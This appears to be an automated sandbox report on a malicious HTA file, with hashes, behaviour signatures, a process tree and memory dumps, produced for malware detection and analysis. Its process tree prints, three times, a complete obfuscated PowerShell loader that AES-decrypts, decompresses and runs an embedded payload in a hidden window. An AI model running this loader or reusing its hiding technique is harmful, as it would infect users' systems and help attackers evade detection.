Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    200s
  • max time network
    199s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/10/2023, 00:28

General

  • Target

    deef9b58009eedec781267660e50de1ae404656d0d4b556feead857cd94b8156_JC.hta

  • Size

    1.3MB

  • MD5

    1d79ae342a84393e3b52a239e48e25db

  • SHA1

    4aaa0e4a1f56df8c163ed051e4ba140984748a31

  • SHA256

    deef9b58009eedec781267660e50de1ae404656d0d4b556feead857cd94b8156

  • SHA512

    340407374ef1ad16da7374f123b8f7dd0c5aedb24bce2d36a904d4385328b7b6a31729a8409d67795baff9a3832d3a48712c8e6cc32b6db8117371d227cc7f4a

  • SSDEEP

    6144:tkDlvmcFdKukb08m+dQx/EIAJyZffYISZ/:vZ/

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\deef9b58009eedec781267660e50de1ae404656d0d4b556feead857cd94b8156_JC.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:372
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $pBuoGDXT = 'AAAAAAAAAAAAAAAAAAAAAFy+EMbUMvMJo3vKX7LrHvmDj13fXzmwqXCpukEhyyUI3AMx77gvYbusHZ4hxYlVU7b2/Sd3M5o1gKIOs0WJ24rr1oGt1QjcJR0u3NktwuPs2/VpIzAn7139POKxJ6lBmvrjQSF6zJ0kduiPEdQIB8i/i0u99pH87kDKTAUlREAS8BTrdRka542T95/9Gc6656BNxpYEQf2QAxRYHSbxSWiQGFK/YgGoiSLE6ty0FG78OvKBAAdeDjCUaODS+cojLRmTGE8S1vEQlGREtiezmOWAS076dRIe2wCDC6NnlS/7gAR8+WmK7vFy05XyNOIdjsGJuNZeBO8FY5QWTZl+qEe8banPuit20enjY3ZXILJcy5NWBdrCjwW0ilqZuFyCKIVfr1+LweLD2ZSc7WDzGEK51pJkN2zJ9INVzDTBBpyNHAXP8pmQMB10Ly1p9MqLn3C3AnOHR6npswIMbfNnknsEPZ8RQMHDxyU+VxDNPmgbHlq3GKZ3cMUy6SNCK+TFshHkJmcmQ+Q1EmqIlO3pyqmtQlPn+sdL2DxeeTXFsXT6KgmEGXkW+0lgjJcWTMQW/tIrqVZOTWeavhOP8vqmMc3F6A/uNdgHwqWcnzwMWfCHdDpIiWS1i9fQiw16OkgrkpSVeDhzPdFBbt5+l+3AfgJXksblGAVuS2PLOWD8o/YYVL/KNhBRI0aKzyMs0r8/wWn0Pxew7PIKYt+m3JiB2OGNyfvlJ1f/hJ/ODb/VedoCvPN3hVHqJQk4eARpM6wjuDOQV2S2duJN9FtlEA5KQKKIwD7GsKfwRvxU4c9S+tk+M+kJ2oLGiaRqCTJsF4XAbbNI3qeUAbgqMvwo1iS95AoyJRAsuFMJpBbt5+hQIUNqWE9gH4FReZF3uRkJJ7/CWRpct8KisIa1rSX91r0l9pgvmJ98cu59P35V6Sipyjy3+GqSuxg7+/XLmefCBORQYye0zBk6QVmZduvldKPCGXfRt/6ng+yOpW9UIIRoH2SEwxt6n8bLKswRP7F4pBwrVxNEF60lXUid6jKg44E4gSzSKl1ayUh/olX4RPMdL7KBy8WKWbF2JQzZHkbhzarzH/eNfZn2Np5HjNWSkuCQIh0=';$Scxrc = 'dUdremhBRVpqWmdLT3NxRXlXanFtcHpGZWdRRVdoRmo=';$dLPDYZ = New-Object 'System.Security.Cryptography.AesManaged';$dLPDYZ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$dLPDYZ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$dLPDYZ.BlockSize = 128;$dLPDYZ.KeySize = 256;$dLPDYZ.Key = [System.Convert]::FromBase64String($Scxrc);$yEsDu = [System.Convert]::FromBase64String($pBuoGDXT);$qyDTpjIY = $yEsDu[0..15];$dLPDYZ.IV = $qyDTpjIY;$uTpbZaIXi = $dLPDYZ.CreateDecryptor();$tpRGoQYrw = $uTpbZaIXi.TransformFinalBlock($yEsDu, 16, $yEsDu.Length - 16);$dLPDYZ.Dispose();$wmhF = New-Object System.IO.MemoryStream( , $tpRGoQYrw );$EyecAc = New-Object System.IO.MemoryStream;$sVIbzvgSN = New-Object System.IO.Compression.GzipStream $wmhF, ([IO.Compression.CompressionMode]::Decompress);$sVIbzvgSN.CopyTo( $EyecAc );$sVIbzvgSN.Close();$wmhF.Close();[byte[]] $AXQUFdWN = $EyecAc.ToArray();$GTChecsr = [System.Text.Encoding]::UTF8.GetString($AXQUFdWN);$GTChecsr | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4696
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $pBuoGDXT = 'AAAAAAAAAAAAAAAAAAAAAFy+EMbUMvMJo3vKX7LrHvmDj13fXzmwqXCpukEhyyUI3AMx77gvYbusHZ4hxYlVU7b2/Sd3M5o1gKIOs0WJ24rr1oGt1QjcJR0u3NktwuPs2/VpIzAn7139POKxJ6lBmvrjQSF6zJ0kduiPEdQIB8i/i0u99pH87kDKTAUlREAS8BTrdRka542T95/9Gc6656BNxpYEQf2QAxRYHSbxSWiQGFK/YgGoiSLE6ty0FG78OvKBAAdeDjCUaODS+cojLRmTGE8S1vEQlGREtiezmOWAS076dRIe2wCDC6NnlS/7gAR8+WmK7vFy05XyNOIdjsGJuNZeBO8FY5QWTZl+qEe8banPuit20enjY3ZXILJcy5NWBdrCjwW0ilqZuFyCKIVfr1+LweLD2ZSc7WDzGEK51pJkN2zJ9INVzDTBBpyNHAXP8pmQMB10Ly1p9MqLn3C3AnOHR6npswIMbfNnknsEPZ8RQMHDxyU+VxDNPmgbHlq3GKZ3cMUy6SNCK+TFshHkJmcmQ+Q1EmqIlO3pyqmtQlPn+sdL2DxeeTXFsXT6KgmEGXkW+0lgjJcWTMQW/tIrqVZOTWeavhOP8vqmMc3F6A/uNdgHwqWcnzwMWfCHdDpIiWS1i9fQiw16OkgrkpSVeDhzPdFBbt5+l+3AfgJXksblGAVuS2PLOWD8o/YYVL/KNhBRI0aKzyMs0r8/wWn0Pxew7PIKYt+m3JiB2OGNyfvlJ1f/hJ/ODb/VedoCvPN3hVHqJQk4eARpM6wjuDOQV2S2duJN9FtlEA5KQKKIwD7GsKfwRvxU4c9S+tk+M+kJ2oLGiaRqCTJsF4XAbbNI3qeUAbgqMvwo1iS95AoyJRAsuFMJpBbt5+hQIUNqWE9gH4FReZF3uRkJJ7/CWRpct8KisIa1rSX91r0l9pgvmJ98cu59P35V6Sipyjy3+GqSuxg7+/XLmefCBORQYye0zBk6QVmZduvldKPCGXfRt/6ng+yOpW9UIIRoH2SEwxt6n8bLKswRP7F4pBwrVxNEF60lXUid6jKg44E4gSzSKl1ayUh/olX4RPMdL7KBy8WKWbF2JQzZHkbhzarzH/eNfZn2Np5HjNWSkuCQIh0=';$Scxrc = 'dUdremhBRVpqWmdLT3NxRXlXanFtcHpGZWdRRVdoRmo=';$dLPDYZ = New-Object 'System.Security.Cryptography.AesManaged';$dLPDYZ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$dLPDYZ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$dLPDYZ.BlockSize = 128;$dLPDYZ.KeySize = 256;$dLPDYZ.Key = [System.Convert]::FromBase64String($Scxrc);$yEsDu = [System.Convert]::FromBase64String($pBuoGDXT);$qyDTpjIY = $yEsDu[0..15];$dLPDYZ.IV = $qyDTpjIY;$uTpbZaIXi = $dLPDYZ.CreateDecryptor();$tpRGoQYrw = $uTpbZaIXi.TransformFinalBlock($yEsDu, 16, $yEsDu.Length - 16);$dLPDYZ.Dispose();$wmhF = New-Object System.IO.MemoryStream( , $tpRGoQYrw );$EyecAc = New-Object System.IO.MemoryStream;$sVIbzvgSN = New-Object System.IO.Compression.GzipStream $wmhF, ([IO.Compression.CompressionMode]::Decompress);$sVIbzvgSN.CopyTo( $EyecAc );$sVIbzvgSN.Close();$wmhF.Close();[byte[]] $AXQUFdWN = $EyecAc.ToArray();$GTChecsr = [System.Text.Encoding]::UTF8.GetString($AXQUFdWN);$GTChecsr | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5048
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $pBuoGDXT = 'AAAAAAAAAAAAAAAAAAAAAFy+EMbUMvMJo3vKX7LrHvmDj13fXzmwqXCpukEhyyUI3AMx77gvYbusHZ4hxYlVU7b2/Sd3M5o1gKIOs0WJ24rr1oGt1QjcJR0u3NktwuPs2/VpIzAn7139POKxJ6lBmvrjQSF6zJ0kduiPEdQIB8i/i0u99pH87kDKTAUlREAS8BTrdRka542T95/9Gc6656BNxpYEQf2QAxRYHSbxSWiQGFK/YgGoiSLE6ty0FG78OvKBAAdeDjCUaODS+cojLRmTGE8S1vEQlGREtiezmOWAS076dRIe2wCDC6NnlS/7gAR8+WmK7vFy05XyNOIdjsGJuNZeBO8FY5QWTZl+qEe8banPuit20enjY3ZXILJcy5NWBdrCjwW0ilqZuFyCKIVfr1+LweLD2ZSc7WDzGEK51pJkN2zJ9INVzDTBBpyNHAXP8pmQMB10Ly1p9MqLn3C3AnOHR6npswIMbfNnknsEPZ8RQMHDxyU+VxDNPmgbHlq3GKZ3cMUy6SNCK+TFshHkJmcmQ+Q1EmqIlO3pyqmtQlPn+sdL2DxeeTXFsXT6KgmEGXkW+0lgjJcWTMQW/tIrqVZOTWeavhOP8vqmMc3F6A/uNdgHwqWcnzwMWfCHdDpIiWS1i9fQiw16OkgrkpSVeDhzPdFBbt5+l+3AfgJXksblGAVuS2PLOWD8o/YYVL/KNhBRI0aKzyMs0r8/wWn0Pxew7PIKYt+m3JiB2OGNyfvlJ1f/hJ/ODb/VedoCvPN3hVHqJQk4eARpM6wjuDOQV2S2duJN9FtlEA5KQKKIwD7GsKfwRvxU4c9S+tk+M+kJ2oLGiaRqCTJsF4XAbbNI3qeUAbgqMvwo1iS95AoyJRAsuFMJpBbt5+hQIUNqWE9gH4FReZF3uRkJJ7/CWRpct8KisIa1rSX91r0l9pgvmJ98cu59P35V6Sipyjy3+GqSuxg7+/XLmefCBORQYye0zBk6QVmZduvldKPCGXfRt/6ng+yOpW9UIIRoH2SEwxt6n8bLKswRP7F4pBwrVxNEF60lXUid6jKg44E4gSzSKl1ayUh/olX4RPMdL7KBy8WKWbF2JQzZHkbhzarzH/eNfZn2Np5HjNWSkuCQIh0=';$Scxrc = 'dUdremhBRVpqWmdLT3NxRXlXanFtcHpGZWdRRVdoRmo=';$dLPDYZ = New-Object 'System.Security.Cryptography.AesManaged';$dLPDYZ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$dLPDYZ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$dLPDYZ.BlockSize = 128;$dLPDYZ.KeySize = 256;$dLPDYZ.Key = [System.Convert]::FromBase64String($Scxrc);$yEsDu = [System.Convert]::FromBase64String($pBuoGDXT);$qyDTpjIY = $yEsDu[0..15];$dLPDYZ.IV = $qyDTpjIY;$uTpbZaIXi = $dLPDYZ.CreateDecryptor();$tpRGoQYrw = $uTpbZaIXi.TransformFinalBlock($yEsDu, 16, $yEsDu.Length - 16);$dLPDYZ.Dispose();$wmhF = New-Object System.IO.MemoryStream( , $tpRGoQYrw );$EyecAc = New-Object System.IO.MemoryStream;$sVIbzvgSN = New-Object System.IO.Compression.GzipStream $wmhF, ([IO.Compression.CompressionMode]::Decompress);$sVIbzvgSN.CopyTo( $EyecAc );$sVIbzvgSN.Close();$wmhF.Close();[byte[]] $AXQUFdWN = $EyecAc.ToArray();$GTChecsr = [System.Text.Encoding]::UTF8.GetString($AXQUFdWN);$GTChecsr
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4236
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3384

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    15KB

    MD5

    d961b9172c32566070ac7332f1565864

    SHA1

    6030ca24a17d1c702083809a29767278734edd4f

    SHA256

    b62902322aa71ecc5a39a3a57ce3e90f41e32e578d780fdcb958c08def4eccd7

    SHA512

    9aeeae7a84718a787443fe7c917df9e8c88198e74307b98e9a0559217a24006b207d1d6159c42711bade9626a1623efcbf5236e1d633a0aec7afcfbba4ac5cc4

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4dxbf11.p0c.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3384-58-0x0000000070E00000-0x00000000715B0000-memory.dmp

    Filesize

    7.7MB

  • memory/3384-34-0x0000000004760000-0x0000000004770000-memory.dmp

    Filesize

    64KB

  • memory/3384-37-0x0000000004760000-0x0000000004770000-memory.dmp

    Filesize

    64KB

  • memory/3384-66-0x0000000006EA0000-0x0000000006F16000-memory.dmp

    Filesize

    472KB

  • memory/3384-65-0x0000000006080000-0x00000000060C4000-memory.dmp

    Filesize

    272KB

  • memory/3384-32-0x0000000070E00000-0x00000000715B0000-memory.dmp

    Filesize

    7.7MB

  • memory/3384-63-0x0000000004760000-0x0000000004770000-memory.dmp

    Filesize

    64KB

  • memory/3384-60-0x0000000004760000-0x0000000004770000-memory.dmp

    Filesize

    64KB

  • memory/4236-64-0x0000000007CB0000-0x000000000832A000-memory.dmp

    Filesize

    6.5MB

  • memory/4236-59-0x0000000070E00000-0x00000000715B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4236-61-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

    Filesize

    64KB

  • memory/4236-62-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

    Filesize

    64KB

  • memory/4236-67-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

    Filesize

    64KB

  • memory/4236-36-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

    Filesize

    64KB

  • memory/4236-35-0x0000000004ED0000-0x0000000004EE0000-memory.dmp

    Filesize

    64KB

  • memory/4236-70-0x0000000070E00000-0x00000000715B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4236-33-0x0000000070E00000-0x00000000715B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4696-18-0x0000000006160000-0x000000000617E000-memory.dmp

    Filesize

    120KB

  • memory/4696-19-0x00000000061A0000-0x00000000061EC000-memory.dmp

    Filesize

    304KB

  • memory/4696-28-0x0000000002890000-0x00000000028A0000-memory.dmp

    Filesize

    64KB

  • memory/4696-27-0x0000000007770000-0x0000000007D14000-memory.dmp

    Filesize

    5.6MB

  • memory/4696-26-0x00000000066D0000-0x00000000066F2000-memory.dmp

    Filesize

    136KB

  • memory/4696-25-0x0000000006680000-0x000000000669A000-memory.dmp

    Filesize

    104KB

  • memory/4696-24-0x0000000006700000-0x0000000006796000-memory.dmp

    Filesize

    600KB

  • memory/4696-23-0x0000000002890000-0x00000000028A0000-memory.dmp

    Filesize

    64KB

  • memory/4696-22-0x0000000002890000-0x00000000028A0000-memory.dmp

    Filesize

    64KB

  • memory/4696-21-0x0000000002890000-0x00000000028A0000-memory.dmp

    Filesize

    64KB

  • memory/4696-20-0x0000000070E00000-0x00000000715B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4696-31-0x0000000070E00000-0x00000000715B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4696-1-0x0000000070E00000-0x00000000715B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4696-17-0x0000000005CB0000-0x0000000006004000-memory.dmp

    Filesize

    3.3MB

  • memory/4696-12-0x0000000005AE0000-0x0000000005B46000-memory.dmp

    Filesize

    408KB

  • memory/4696-6-0x0000000005A70000-0x0000000005AD6000-memory.dmp

    Filesize

    408KB

  • memory/4696-5-0x0000000005190000-0x00000000051B2000-memory.dmp

    Filesize

    136KB

  • memory/4696-4-0x00000000052D0000-0x00000000058F8000-memory.dmp

    Filesize

    6.2MB

  • memory/4696-3-0x0000000002890000-0x00000000028A0000-memory.dmp

    Filesize

    64KB

  • memory/4696-0-0x0000000002830000-0x0000000002866000-memory.dmp

    Filesize

    216KB

  • memory/4696-2-0x0000000002890000-0x00000000028A0000-memory.dmp

    Filesize

    64KB